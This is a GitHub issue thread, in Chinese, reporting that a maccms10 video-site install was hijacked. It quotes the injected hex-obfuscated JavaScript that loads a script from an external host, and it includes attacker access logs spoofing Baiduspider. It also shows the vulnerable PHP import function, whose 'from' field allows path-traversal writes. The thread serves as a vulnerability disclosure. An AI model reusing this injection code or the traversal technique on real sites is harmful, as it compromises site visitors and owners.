### ISSUE TITLE
劫持漏洞

### ISSUE THREAD

**Issue by zatol** [magicblack/maccms10#521]
劫持代码：
`;var head=document.getElementsByTagName('head')[0];var script=document.createElement('script');script['src']='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73';head.appendChild(script);<script src="https://maccms.z23.web.core.windows.net/732d.js"></script>`
注入日志：
`20.194.3.128 - - [07/Dec/2020:04:22:24 +0800] "GET /admin.php HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
20.194.3.128 - - [07/Dec/2020:04:22:24 +0800] "GET /admin.php/admin/index/index.html HTTP/1.1" 302 5 "http://www.xxx.xyz/admin.php" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
20.194.3.128 - - [07/Dec/2020:04:22:24 +0800] "GET /admin.php/admin/index/login.html HTTP/1.1" 200 1568 "http://www.xxx.xyz/admin.php/admin/index/index.html" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
20.194.3.128 - - [07/Dec/2020:04:22:24 +0800] "GET / HTTP/1.1" 200 13388 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
20.194.3.128 - - [07/Dec/2020:04:22:26 +0800] "POST /admin.php/admin/vodplayer/import.html HTTP/1.1" 200 995 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
20.194.3.128 - - [07/Dec/2020:04:22:26 +0800] "GET /admin.php/admin/vodplayer/del?ids=../../template/xxx/js/jquery.min HTTP/1.1" 200 964 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
`

肇事代码：
```
public function __construct()
    {
        parent::__construct();

        //判断用户登录状态

        if(in_array($this->_cl,['Index']) && in_array($this->_ac,['login','logout'])) {

        }
        elseif(ENTRANCE=='api' && in_array($this->_cl,['Timming']) && in_array($this->_ac,['index'])){

        }
        else {
            $res = model('Admin')->checkLogin();

            if ($res['code'] > 1) {
                return $this->redirect('index/login');
            }
            $this->_admin = $res['info'];
            $this->_pagesize = $GLOBALS['config']['app']['pagesize'];
            $this->_makesize = $GLOBALS['config']['app']['makesize'];

            if($this->_cl!='Update' && !$this->check_auth($this->_cl,$this->_ac)){
                return $this->error('您没有权限访问此页面');
            }
        }
    }

public function import()
    {
        $file = $this->request->file('file');
        $info = $file->rule('uniqid')->validate(['size' => 10240000, 'ext' => 'txt']);
        if ($info) {
            $data = json_decode(base64_decode(file_get_contents($info->getpathName())), true);
            @unlink($info->getpathName());
            if($data){

                if(empty($data['status']) || empty($data['from']) || empty($data['sort']) ){
                    return $this->error('格式错误');
                }
                $code = $data['code'];
                unset($data['code']);

                $list = config($this->_pre);
                $list[$data['from']] = $data;
                $res = mac_arr2file( APP_PATH .'extra/'.$this->_pre.'.php', $list);
                if($res===false){
                    return $this->error('保存配置文件失败，请重试!');
                }

                $res = fwrite(fopen('./static/player/' . $data['from'].'.js','wb'),$code);
                if($res===false){
                    return $this->error('保存代码文件失败，请重试!');
                }

            }
            return $this->success('导入失败，请检查文件格式');
        }
        else{
            return $this->error($file->getError());
        }
    }
```

**Comment by magicblack** [comment]
import方法已经做了加入安全判断。  登录这块有什么问题？ 具体利用请求和参数

**Comment by zatol** [comment]
感谢处理！我也不是很懂，登陆那里我也不知道他是怎么过的认证，认证通过后给import里post了劫持的代码，$data['from']是../../template/xxx/js/jquery.min这样的数据
